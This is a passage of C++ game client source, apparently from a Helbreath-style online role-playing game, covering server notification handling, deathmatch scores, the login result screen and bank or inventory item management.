		AddEventList(NOTIFY_MSG_HANDLER58, 10);
		break;

	case DEF_NOTIFY_NOGUILDMASTERLEVEL:
		AddEventList(NOTIFY_MSG_HANDLER59, 10);
		break;
	case DEF_NOTIFY_SUCCESSBANGUILDMAN:
		AddEventList(NOTIFY_MSG_HANDLER60, 10);
		break;
	case DEF_NOTIFY_CANNOTBANGUILDMAN:
		AddEventList(NOTIFY_MSG_HANDLER61, 10);
		break;

	case DEF_NOTIFY_PLAYERSHUTUP:
		NotifyMsg_PlayerShutUp(pData);
		break;

	case DEF_NOTIFY_TIMECHANGE:
		NotifyMsg_TimeChange(pData);
		break;

	case DEF_NOTIFY_TOBERECALLED:
		AddEventList(NOTIFY_MSG_HANDLER62, 10);
		break;

	case DEF_NOTIFY_HUNGER:
		NotifyMsg_Hunger(pData);
		break;

	case DEF_NOTIFY_PLAYERPROFILE:
		NotifyMsg_PlayerProfile(pData);
		break;

	case DEF_NOTIFY_WHISPERMODEON:
		NotifyMsg_WhisperMode(TRUE, pData);
		break;

	case DEF_NOTIFY_WHISPERMODEOFF:
		NotifyMsg_WhisperMode(FALSE, pData);
		break;

	case DEF_NOTIFY_PLAYERONGAME:
		NotifyMsg_PlayerStatus(TRUE, pData);
		break;

	case DEF_NOTIFY_PLAYERNOTONGAME:
		NotifyMsg_PlayerStatus(FALSE, pData);
		break;



	case DEF_NOTIFY_ITEMSOLD:
		DisableDialogBox(23);
		break;

	case DEF_NOTIFY_ITEMREPAIRED:
		DisableDialogBox(23);
		NotifyMsg_ItemRepaired(pData);
		break;

	case DEF_NOTIFY_CANNOTREPAIRITEM:
		NotifyMsg_CannotRepairItem(pData);
		break;

	case DEF_NOTIFY_CANNOTSELLITEM:
		NotifyMsg_CannotSellItem(pData);
		break;

	//50Cent - Repair All
    case DEF_NOTIFY_REPAIRALLPRICES:
        NotifyMsg_RepairAllPrices(pData);
        break;

	case DEF_NOTIFY_REPAIRITEMPRICE:
		NotifyMsg_RepairItemPrice(pData);
		break;

	case DEF_NOTIFY_SELLITEMPRICE:
		NotifyMsg_SellItemPrice(pData);
		break;

	case DEF_NOTIFY_SHOWMAP:
		NotifyMsg_ShowMap(pData);
		break;

	case DEF_NOTIFY_SKILLUSINGEND:
		NotifyMsg_SkillUsingEnd(pData);
		break;

	case DEF_NOTIFY_TOTALUSERS:
		NotifyMsg_TotalUsers(pData);
		break;

	case DEF_NOTIFY_MAGICEFFECTOFF:
		NotifyMsg_MagicEffectOff(pData);
		break;

	case DEF_NOTIFY_MAGICEFFECTON:
		NotifyMsg_MagicEffectOn(pData);
		break;

	case DEF_NOTIFY_CANNOTITEMTOBANK:
		AddEventList(NOTIFY_MSG_HANDLER63, 10);
		break;

	case DEF_NOTIFY_SERVERCHANGE:
		NotifyMsg_ServerChange(pData);
		break;

	case DEF_NOTIFY_SKILL:
		NotifyMsg_Skill(pData);
		break;

	case DEF_NOTIFY_SETITEMCOUNT:
		NotifyMsg_SetItemCount(pData);
		break;

	case DEF_NOTIFY_ITEMDEPLETED_ERASEITEM:
		NotifyMsg_ItemDepleted_EraseItem(pData);
		break;

	case DEF_NOTIFY_DROPITEMFIN_ERASEITEM:
		NotifyMsg_DropItemFin_EraseItem(pData);
		break;

	case DEF_NOTIFY_GIVEITEMFIN_ERASEITEM:
		NotifyMsg_GiveItemFin_EraseItem(pData);
		break;

	case DEF_NOTIFY_ENEMYKILLREWARD:
		NotifyMsg_EnemyKillReward(pData);
		break;

	case DEF_NOTIFY_PKCAPTURED:
		NotifyMsg_PKcaptured(pData);
		break;

	case DEF_NOTIFY_PKPENALTY:
		NotifyMsg_PKpenalty(pData);
		break;

	case DEF_NOTIFY_ITEMTOBANK:
		NotifyMsg_ItemToBank(pData);
		break;

	case DEF_NOTIFY_TRAVELERLIMITEDLEVEL:
		AddEventList(NOTIFY_MSG_HANDLER64, 10);
		break;

	case DEF_NOTIFY_LIMITEDLEVEL:
		AddEventList(NOTIFYMSG_LIMITED_LEVEL1, 10);
		break;

	case DEF_NOTIFY_ITEMLIFESPANEND:
		NotifyMsg_ItemLifeSpanEnd(pData);
		break;

	case DEF_NOTIFY_ITEMRELEASED:
		NotifyMsg_ItemReleased(pData);
		break;

	case DEF_NOTIFY_ITEMOBTAINED:
		NotifyMsg_ItemObtained(pData);
		break;

	case DEF_NOTIFY_ITEMPURCHASED:
		NotifyMsg_ItemPurchased(pData);
		break;

	case DEF_NOTIFY_QUERY_JOINGUILDREQPERMISSION:
		NotifyMsg_QueryJoinGuildPermission(pData);
		break;

	case DEF_NOTIFY_QUERY_DISMISSGUILDREQPERMISSION:
		NotifyMsg_QueryDismissGuildPermission(pData);
		break;

	case DEF_COMMONTYPE_JOINGUILDAPPROVE:
		NotifyMsg_JoinGuildApprove(pData);
		break;

	case DEF_COMMONTYPE_JOINGUILDREJECT:
		NotifyMsg_JoinGuildReject(pData);
		break;

	case DEF_COMMONTYPE_DISMISSGUILDAPPROVE:
		NotifyMsg_DismissGuildApprove(pData);
		break;

	case DEF_COMMONTYPE_DISMISSGUILDREJECT:
		NotifyMsg_DismissGuildReject(pData);
		break;

	case DEF_NOTIFY_CANNOTCARRYMOREITEM:
		AddEventList(NOTIFY_MSG_HANDLER65, 10);//"
		AddEventList(NOTIFY_MSG_HANDLER66, 10);//"
		// Bank dialog Box
		m_stDialogBoxInfo[14].cMode = 0;
		break;

	case DEF_NOTIFY_NOTENOUGHGOLD:
		DisableDialogBox(23);
		AddEventList(NOTIFY_MSG_HANDLER67, 10);//"Gold
		cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
		if (*cp >= 0) {
			m_bIsItemDisabled[*cp] = FALSE;
		}
		break;

	case DEF_NOTIFY_HP:
		NotifyMsg_HP(pData);
		break;
	case DEF_NOTIFY_MP:
		NotifyMsg_MP(pData);
		break;
	case DEF_NOTIFY_SP:
		NotifyMsg_SP(pData);
		break;
	case DEF_NOTIFY_KILLED:
		NotifyMsg_Killed(pData);
		break;
	case DEF_NOTIFY_EXP:
		NotifyMsg_Exp(pData);
		break;
	case DEF_NOTIFY_GUILDDISBANDED:
		NotifyMsg_GuildDisbanded(pData);
		break;
	case DEF_NOTIFY_CANNOTJOINMOREGUILDSMAN:
		NotifyMsg_CannotJoinMoreGuildsMan(pData);
		break;
	case DEF_NOTIFY_NEWGUILDSMAN:
		NotifyMsg_NewGuildsMan(pData);
		break;
	case DEF_NOTIFY_DISMISSGUILDSMAN:
		NotifyMsg_DismissGuildsMan(pData);
		break;
	case DEF_NOTIFY_MAGICSTUDYSUCCESS:
		NotifyMsg_MagicStudySuccess(pData);
		break;
	case DEF_NOTIFY_MAGICSTUDYFAIL:
		NotifyMsg_MagicStudyFail(pData);
		break;
	case DEF_NOTIFY_SKILLTRAINSUCCESS:
		NotifyMsg_SkillTrainSuccess(pData);
		break;
	case DEF_NOTIFY_SKILLTRAINFAIL:
		break;
	case DEF_NOTIFY_FORCEDISCONN:
		NotifyMsg_ForceDisconn(pData);
		break;
	case DEF_NOTIFY_FIGHTZONERESERVE:
		cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
		ip = (int *)cp;
		switch (*ip) {
		case -5:
			AddEventList(NOTIFY_MSG_HANDLER68, 10);
			break;
		case -4:
			AddEventList(NOTIFY_MSG_HANDLER69, 10);
			break;
		case -3:
			AddEventList(NOTIFY_MSG_HANDLER70, 10);
			break;
		case -2:
			m_iFightzoneNumber = 0;
			AddEventList(NOTIFY_MSG_HANDLER71, 10);
			break;
		case -1:
			m_iFightzoneNumber = m_iFightzoneNumber * -1 ;
			AddEventList(NOTIFY_MSG_HANDLER72, 10);
			break;
		case 1:
		case 2:
		case 3:
		case 4:
		case 5:
		case 6:
		case 7:
		case 8:
		case 9:
			wsprintf(cTxt, NOTIFY_MSG_HANDLER73, *ip);//"
			AddEventList(cTxt, 10);
			break;
		}
		break;
	}
}

void CGame::NotifyMsg_DGKill(char *pData) // MORLA 2.2 - Actualiza la info del Deathmach Game
{
 char * cp, cStr[12];
 int  * ip, iV1, iV2, iV3;

	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);

	ip = (int *)cp;
	iV1 = *ip;
	cp += 4;

	ip = (int *)cp;
	iV2 = *ip;
	cp += 4;

	ip = (int *)cp;
	iV3 = *ip;
	cp += 4;

	strcpy(cStr, cp);
	cp += 12;

	switch (iV1)
	{
		case 1:	iDGKill1 = iV2;	iDGDeath1 = iV3; ZeroMemory(cDGName1, sizeof(cDGName1)); memcpy (cDGName1, cStr, 10); break;
		case 2:	iDGKill2 = iV2;	iDGDeath2 = iV3; ZeroMemory(cDGName2, sizeof(cDGName2)); memcpy (cDGName2, cStr, 10); break;
		case 3:	iDGKill3 = iV2;	iDGDeath3 = iV3; ZeroMemory(cDGName3, sizeof(cDGName3)); memcpy (cDGName3, cStr, 10); break;
		case 4:	iDGKill4 = iV2;	iDGDeath4 = iV3; ZeroMemory(cDGName4, sizeof(cDGName4)); memcpy (cDGName4, cStr, 10); break;
		case 5:	iDGKill5 = iV2;	iDGDeath5 = iV3; ZeroMemory(cDGName5, sizeof(cDGName5)); memcpy (cDGName5, cStr, 10); break;
		case 6:	iDGKill6 = iV2;	iDGDeath6 = iV3; ZeroMemory(cDGName6, sizeof(cDGName6)); memcpy (cDGName6, cStr, 10); break;
		case 7:	iDGKill7 = iV2;	iDGDeath7 = iV3; ZeroMemory(cDGName7, sizeof(cDGName7)); memcpy (cDGName7, cStr, 10); break;
		case 8:	iDGKill8 = iV2;	iDGDeath8 = iV3; ZeroMemory(cDGName8, sizeof(cDGName8)); memcpy (cDGName8, cStr, 10); break;
		case 9:	iDGKill9 = iV2;	iDGDeath9 = iV3; ZeroMemory(cDGName9, sizeof(cDGName9)); memcpy (cDGName9, cStr, 10); break;
		case 10:	iDGKill10 = iV2;	iDGDeath10 = iV3; ZeroMemory(cDGName10, sizeof(cDGName10)); memcpy (cDGName10, cStr, 10); break;
		default: break;
	}
}

void CGame::NotifyMsg_REPDGDEATHS(char *pData) // MORLA 2.2 - Actualiza la info de DGPoints Deaths y REP ... paja terrible hacer 3
{
 char * cp;
 int  * ip, iV1, iV2, iV3;

	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);

	ip = (int *)cp;
	iV1 = *ip;
	cp += 4;

	ip = (int *)cp;
	iV2 = *ip;
	cp += 4;

	ip = (int *)cp;
	iV3 = *ip;
	cp += 4;

	m_iPlayerDGPoints = iV1;
	m_iPlayerDeaths = iV2;
	m_iRating = iV3;

}

void CGame::ReserveFightzoneResponseHandler(char * pData)
{
 	WORD * wpResult;
	char * cp ;
	int * ip ;
 	wpResult = (WORD *)(pData + DEF_INDEX2_MSGTYPE);
	switch (*wpResult) {
	case DEF_MSGTYPE_CONFIRM:
		AddEventList(RESERVE_FIGHTZONE_RESPONSE_HANDLER1, 10);
		m_stDialogBoxInfo[7].cMode = 14;
		m_iFightzoneNumber = m_iFightzoneNumberTemp ;
		break;

	case DEF_MSGTYPE_REJECT:
		cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
		ip   = (int *)cp;
		cp += 4;
		AddEventList(RESERVE_FIGHTZONE_RESPONSE_HANDLER2, 10);
		m_iFightzoneNumberTemp = 0 ;

		if (*ip == 0) {
		 	m_stDialogBoxInfo[7].cMode = 15;
		}else if (*ip == -1){
			m_stDialogBoxInfo[7].cMode = 16;
		} else if (*ip == -2) {
			m_stDialogBoxInfo[7].cMode = 17;
		}else if (*ip == -3) {
			m_stDialogBoxInfo[7].cMode = 21;
		}else if (*ip == -4) {
			m_stDialogBoxInfo[7].cMode = 22;
		}
		break;
	}
}

void CGame::UpdateScreen_OnLogResMsg()
{
 short msX, msY, msZ, sX, sY;
 char  cLB, cRB;
 DWORD dwTime = timeGetTime();
 static DWORD dwCTime;
 static class CMouseInterface * pMI;
 int   iMIbuttonNum;
 char  cMIresult;


	if (m_cGameModeCount == 0)
	{	
		pMI = new class CMouseInterface;
		pMI->AddRect(370 + SCREENX, 240 + SCREENY, 370 + SCREENX + DEF_BTNSZX, 240 + SCREENY + DEF_BTNSZY);
		m_bEnterPressed = FALSE;
		m_bEscPressed   = FALSE;
		m_cArrowPressed = 0;
		dwCTime = timeGetTime();
		if (m_bSoundFlag) m_pESound[38]->bStop();
	}

	m_cGameModeCount++;
	if (m_cGameModeCount > 100) m_cGameModeCount = 100;

	if (m_bEscPressed == TRUE || m_bEnterPressed) {
		switch (m_cMsg[0]) {
		case '1':
			ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
			break;
		case '2':
			ChangeGameMode(DEF_GAMEMODE_ONCREATENEWCHARACTER);
			break;
		case '3':
			ChangeGameMode(DEF_GAMEMODE_ONSELECTCHARACTER);
			break;
		case '4':
			ChangeGameMode(DEF_GAMEMODE_ONSELECTCHARACTER);
			break;
		case '5':
				ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
			break;
		case '6':
			switch (m_cMsg[1]) {
			case 'B':
				ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
				break;
			case 'C': ChangeGameMode(DEF_GAMEMODE_ONCHANGEPASSWORD); break;
			case 'M': ChangeGameMode(DEF_GAMEMODE_ONCHANGEPASSWORD); break;
			}
			break;
		case '7':
		case '8':
			ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
			break;
		}

		delete pMI;
		m_bEscPressed = FALSE;
		return;
	}

	m_DInput.UpdateMouseState(&msX, &msY, &msZ, &cLB, &cRB);

	m_DDraw.ClearBackB4();

	switch (m_cMsg[0]) {
	case '0':
	case '5':
		_Draw_UpdateScreen_OnCreateNewAccount();
		break;

	case '1':
	case '7':
		sX = 146;
		sY = 114;

		_Draw_OnLogin(m_cAccountName, m_cAccountPassword, 0, 0);
		break;

	case '2':
	case '4':
		_bDraw_OnCreateNewCharacter(m_cPlayerName, 0, 0, 0);
		break;

	case '3':
		sX = 0;
		sY = 0;
		UpdateScreen_OnSelectCharacter(sX, sY, 0, 0);
		break;

	case '6':
		sX = 146;
		sY = 114;

		UpdateScreen_OnSelectCharacter(0, 0, 0, 0, TRUE);
		break;
	case '8':
		DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_MAINMENU, -1, -1, 0, TRUE);
		break;
	}
#ifdef RES_HIGH
	m_DDraw.DrawShadowBox(0,0, 800, 600);
#else
	m_DDraw.DrawShadowBox(0,0,639,479);
#endif
	DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_GAME4, 162 + SCREENX,125 + SCREENY,2);

	if ((msX >= 370 + SCREENX) && (msX <= 370 + SCREENX + DEF_BTNSZX) && (msY >= 244 + SCREENY) && (msY <= 244 + SCREENY + DEF_BTNSZY))
		 DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 370 + SCREENX, 244 + SCREENY, 1);
	else DrawNewDialogBox(DEF_SPRID_INTERFACE_ND_BUTTON, 370 + SCREENX, 244 + SCREENY, 0);

	switch (m_cMsg[1]) {
	case '1':
		PutString_SprFont(172 + 70 + SCREENX, 165 + SCREENY, "Password is not correct!", 7,0,0);
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 195 + SCREENY, UPDATE_SCREEN_ON_LOG_MSG5);//"
		break;

	case '2':
		PutString_SprFont(172 + 70 + SCREENX, 165 + SCREENY, "Not existing account!", 7,0,0);
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 195 + SCREENY, UPDATE_SCREEN_ON_LOG_MSG6);//"
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 215 + SCREENY, UPDATE_SCREEN_ON_LOG_MSG7);//"
		break;

	case '3':
		PutString_SprFont(172 + 10 +34 + SCREENX, 165 + SCREENY, "Can not connect to game server!", 7,0,0);
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 195 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG8);//"
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 210 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG9);//"
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 225 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG10);//"
		break;

	case '4':
		PutString_SprFont(172 + 58 + SCREENX, 165 + SCREENY, "New account created.", 7,0,0);
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 195 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG11);//"
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 210 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG12);//"
		break;

	case '5':
		PutString_SprFont(172 + 58 + SCREENX, 165 + SCREENY, "Can not create new account!", 7,0,0);
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 195 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG13);//"
		break;

	case '6':
		PutString_SprFont(172 + 36 + SCREENX, 165 + SCREENY, "Can not create new account!", 7,0,0);
		PutString_SprFont(172 + 24 + SCREENX, 180 + SCREENY, "Already existing account name.", 7,0,0);
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 205 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG14);//"
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 220 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG15);//"
		break;

	case '7':
		PutString_SprFont(172 + 58 + SCREENX, 165 + SCREENY, "New character created.", 7,0,0);
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 195 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG16);//"
		break;

	case '8':
		PutString_SprFont(172 + 58 + SCREENX, 165 + SCREENY, "Can not create new character!", 7,0,0);
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 195 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG17);//"
		break;

	case '9':
		PutString_SprFont(172 + 36 + SCREENX, 165 + SCREENY, "Can not create new character!", 7,0,0);
		PutString_SprFont(172 + 24 + SCREENX, 180 + SCREENY, "Already existing character name.", 7,0,0);
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 205 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG18);//"
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 220 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG19);//"
		break;

	case 'A':
		PutString_SprFont(172 + 36 +45 + SCREENX, 165 + SCREENY, "Character deleted.", 7,0,0);
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 195 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG20);//"

		break;
	case 'B':
		PutString_SprFont(172 + 36 +45 + SCREENX, 165 + SCREENY, "Password changed.", 7,0,0);
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 195 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG21);//"
		break;
	case 'C':
		PutString_SprFont(172 + 36 + SCREENX, 165 + SCREENY, "Can not change password!", 7,0,0);
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 195 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG22);//"
		break;

	case 'D':
		PutString_SprFont(172 + 10 +34 + SCREENX, 165 + SCREENY, "Can not connect to game server!", 7,0,0);
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 195 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG23);//"
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 210 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG24);//"
		break;

	case 'E':
		PutString_SprFont(172 + 10 +34 + SCREENX, 165 + SCREENY, "Can not connect to game server!", 7,0,0);
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 195 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG25);//"
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 210 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG26);//"
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 225 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG27);//"
		break;

	case 'F':
		PutString_SprFont(172 + 10 +34 + SCREENX, 165 + SCREENY, "Can not connect to game server!", 7,0,0);
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 195 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG28);//"
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 210 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG29);//"
		break;

	case 'G':
		PutString_SprFont(172 + 10 +34 + SCREENX, 165 + SCREENY, "Can not connect to game server!", 7,0,0);
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 195 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG30);//"
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 210 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG31);//"
		break;

	case 'H':
		PutString_SprFont(172 + 68 + SCREENX, 165 + SCREENY, "Connection Rejected!", 7,0,0);
		if (m_iBlockYear == 0) {
			PutAlignedString(198 + SCREENX, 453 + SCREENX, 195 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG32);//"
			PutAlignedString(198 + SCREENX, 453 + SCREENX, 210 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG33);//"
		}
		else {
			PutAlignedString(198 + SCREENX, 453 + SCREENX, 195 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG34);//"
			wsprintf(G_cTxt, UPDATE_SCREEN_ON_LOG_MSG35, m_iBlockYear, m_iBlockMonth, m_iBlockDay);//"
			PutAlignedString(198 + SCREENX, 453 + SCREENX, 210 + SCREENY,  G_cTxt);
		}
		break;

	case 'I': //
		PutString_SprFont(172 + 68 + SCREENX, 165 + SCREENY, "Not Enough Point!", 7,0,0);

		break;

	case 'J': // v2.15 2002-5-21
		PutString_SprFont(172 + 68 + SCREENX, 165 + SCREENY, "World Server Full", 7,0,0);
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 210 + SCREENY,  "Please ! Try Other World Server");
		break;

	case 'M': 	// v2.18
		PutString_SprFont(172 + 68 + SCREENX, 165 + SCREENY, "Your password expired", 7,0,0);
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 210 + SCREENY,  "Please! Change password");
		break;


	case 'U': // v2.15
		PutString_SprFont(172 + 68 + SCREENX, 165 + SCREENY, "Keycode input Success!", 7,0,0);
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 210 + SCREENY,  "Keycode Registration successed.");

		break;

	case 'X':
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 195 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG38);//"
		PutAlignedString(198 + SCREENX, 453 + SCREENX, 210 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG39);//"
		break;

	case 'Y':
		PutAlignedString(178 + SCREENX, 453 + SCREENX, 195 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG40);//"
		PutAlignedString(178 + SCREENX, 453 + SCREENX, 210 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG41);//"
		break;

	case 'Z':
		PutAlignedString(178 + SCREENX, 453 + SCREENX, 195 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG42);//"
		PutAlignedString(178 + SCREENX, 453 + SCREENX, 210 + SCREENY,  UPDATE_SCREEN_ON_LOG_MSG41);//"
		break;
	}

	iMIbuttonNum = pMI->iGetStatus(msX, msY, cLB, &cMIresult);

	if (cMIresult == DEF_MIRESULT_CLICK) 
	{
		switch (iMIbuttonNum) 
		{
		case 1:
			switch (m_cMsg[0]) 
			{
			case '1':
				ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
				break;
			case '2':
				ChangeGameMode(DEF_GAMEMODE_ONCREATENEWCHARACTER);
				break;
			case '3':
				ChangeGameMode(DEF_GAMEMODE_ONSELECTCHARACTER);
				break;
			case '4':
				ChangeGameMode(DEF_GAMEMODE_ONSELECTCHARACTER);
				break;
			case '5':
				ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
				break;
			case '6':
				switch (m_cMsg[1]) 
				{
					case 'B':
						ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
						break;
					case 'C': ChangeGameMode(DEF_GAMEMODE_ONCHANGEPASSWORD); break;
					case 'M': ChangeGameMode(DEF_GAMEMODE_ONCHANGEPASSWORD); break;
				}
				break;
			case '7':
			case '8':
				ChangeGameMode(DEF_GAMEMODE_ONMAINMENU);
				break;
			}
			delete pMI;
			return;
		}
	}

	if ((dwTime - dwCTime) > 100)
	{	m_cMenuFrame++;
		dwCTime = dwTime;
	}
	if (m_cMenuFrame >= 8)
	{	m_cMenuDirCnt++;
		if (m_cMenuDirCnt > 8)
		{	m_cMenuDir++;
			m_cMenuDirCnt = 1;
		}
		m_cMenuFrame = 0;
	}
	if (m_cMenuDir > 8) m_cMenuDir = 1;
	DrawVersion();
	m_pSprite[DEF_SPRID_MOUSECURSOR]->PutSpriteFast(msX, msY, 0, dwTime);
	if (m_DDraw.iFlip() == DDERR_SURFACELOST) RestoreSprites();
}

void CGame::RetrieveItemHandler(char *pData)
{char * cp, cBankItemIndex, cItemIndex, cTxt[120];
 WORD * wp;
 int j;
	wp = (WORD *)(pData + DEF_INDEX2_MSGTYPE);
	if (*wp != DEF_MSGTYPE_REJECT)
	{	cp = (char *)(pData + DEF_INDEX2_MSGTYPE + 2);
		cBankItemIndex = *cp;
		cp++;
		cItemIndex = *cp;
		cp++;

		if (m_pBankList[cBankItemIndex] != NULL) {
			// v1.42
			char cStr1[64], cStr2[64], cStr3[64];
			GetItemName(m_pBankList[cBankItemIndex], cStr1, cStr2, cStr3);

			ZeroMemory(cTxt, sizeof(cTxt));
			wsprintf(cTxt, RETIEVE_ITEM_HANDLER4, cStr1);//""You took out %s."
			AddEventList(cTxt, 10);

			if ( (m_pBankList[cBankItemIndex]->m_cItemType == DEF_ITEMTYPE_CONSUME) ||
				 (m_pBankList[cBankItemIndex]->m_cItemType == DEF_ITEMTYPE_ARROW) )
			{	if (m_pItemList[cItemIndex]	== NULL) goto RIH_STEP2;
				delete m_pBankList[cBankItemIndex];
				m_pBankList[cBankItemIndex] = NULL;
				for ( j = 0; j <= DEF_MAXBANKITEMS - 2; j++)
				{	if ((m_pBankList[j+1] != NULL) && (m_pBankList[j] == NULL))
					{	m_pBankList[j] = m_pBankList[j+1];
						m_pBankList[j+1] = NULL;
				}	}
			}else
			{
RIH_STEP2:;
				if (m_pItemList[cItemIndex] != NULL) return;
				short nX, nY;
				nX = 40;
				nY = 30;
				for (j = 0; j < DEF_MAXITEMS; j++)
				{	if ( ( m_pItemList[j] != NULL) && (memcmp(m_pItemList[j]->m_cName, cStr1, 20) == 0))
					{	nX = m_pItemList[j]->m_sX+1;
						nY = m_pItemList[j]->m_sY+1;
						break;
				}	}
				m_pItemList[cItemIndex] = m_pBankList[cBankItemIndex];
				m_pItemList[cItemIndex]->m_sX =	nX;
				m_pItemList[cItemIndex]->m_sY =	nY;
                bSendCommand(MSGID_REQUEST_SETITEMPOS, NULL, cItemIndex, nX, nY, NULL, NULL);

				for (j = 0; j < DEF_MAXITEMS; j++)
				if (m_cItemOrder[j] == -1)
				{	m_cItemOrder[j] = cItemIndex;
					break;
				}
				m_bIsItemEquipped[cItemIndex] = FALSE;
				m_bIsItemDisabled[cItemIndex] = FALSE;
				m_pBankList[cBankItemIndex] = NULL;
				for ( j = 0; j <= DEF_MAXBANKITEMS - 2; j++)
				{	if ((m_pBankList[j+1] != NULL) && (m_pBankList[j] == NULL))
					{	m_pBankList[j] = m_pBankList[j+1];
						m_pBankList[j+1] = NULL;
	}	}	}	}	}
	m_stDialogBoxInfo[14].cMode = 0;
}

void CGame::EraseItem(char cItemID)
{int i;
 char cStr1[64], cStr2[64], cStr3[64];
	ZeroMemory(cStr1, sizeof(cStr1));
	ZeroMemory(cStr2, sizeof(cStr2));
	ZeroMemory(cStr3, sizeof(cStr3));
	for( i=0 ; i<6 ; i++ )
	{	if (m_sShortCut[i] == cItemID)
		{	GetItemName(m_pItemList[cItemID], cStr1, cStr2, cStr3);
			if( i < 3 ) wsprintf(G_cTxt, ERASE_ITEM, cStr1, cStr2, cStr3, i+1);
			else wsprintf(G_cTxt, ERASE_ITEM, cStr1, cStr2, cStr3, i+7);
			AddEventList(G_cTxt, 10);
			m_sShortCut[i] = -1;
			// MORLA 2.8 - Arreglado para la barra cast
			switch (i-2)
			{
				case 1: { bBarCast1 = 0;	iBarCast1 = 0; }break;
				case 2: { bBarCast2 = 0;	iBarCast2 = 0; }break;
				case 3: { bBarCast3 = 0;	iBarCast3 = 0; }break;
				case 4: { bBarCast4 = 0;	iBarCast4 = 0; }break;
				case 5: { bBarCast5 = 0;	iBarCast5 = 0; }break;
				default: reiniciarCastBar(); break;
			}
	}	}

	if (cItemID == m_sRecentShortCut)
		m_sRecentShortCut = -1;
	// ItemOrder
	for (i = 0; i < DEF_MAXITEMS; i++)
	if (m_cItemOrder[i] == cItemID)
			m_cItemOrder[i] = -1;
	for (i = 1; i < DEF_MAXITEMS; i++)
	if ((m_cItemOrder[i-1] == -1) && (m_cItemOrder[i] != -1))
	{	m_cItemOrder[i-1] = m_cItemOrder[i];
		m_cItemOrder[i]   = -1;
	}
	// ItemList
	delete m_pItemList[cItemID];
	m_pItemList[cItemID] = NULL;
	m_bIsItemEquipped[cItemID] = FALSE;
	m_bIsItemDisabled[cItemID] = FALSE;
}

void CGame::reiniciarCastBar()
{
bBarCast1 = bBarCast2 = bBarCast3 = bBarCast4 = bBarCast5 = 0;
 iBarCast1 = iBarCast2 = iBarCast3 = iBarCast4 = iBarCast5 = 0;
}

void CGame::DlbBoxDoubleClick_Character(short msX, short msY)
{
	char cEquipPoiStatus[DEF_MAXITEMEQUIPPOS], cItemID = -1;
	short sX, sY, sSprH, sFrame;
	int i;
	if (m_bIsDialogEnabled[17] == TRUE) return;
	sX = m_stDialogBoxInfo[1].sX;
	sY = m_stDialogBoxInfo[1].sY;

